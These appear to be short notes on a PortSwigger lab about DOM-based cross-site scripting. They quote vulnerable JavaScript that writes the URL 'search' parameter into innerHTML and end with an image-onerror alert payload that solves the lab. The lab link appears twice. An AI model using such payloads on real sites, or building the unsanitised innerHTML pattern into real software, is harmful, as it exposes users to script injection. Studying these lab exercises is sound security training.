DOM XSS in innerHTML sink using source location.search
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink

test_payload


Last updated
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink

test_payload


Last updated
function doSearchQuery(query) {
document.getElementById('searchMessage').innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get('search');
if (query) {
doSearchQuery(query);
}<img src=1 onerror=alert("1")>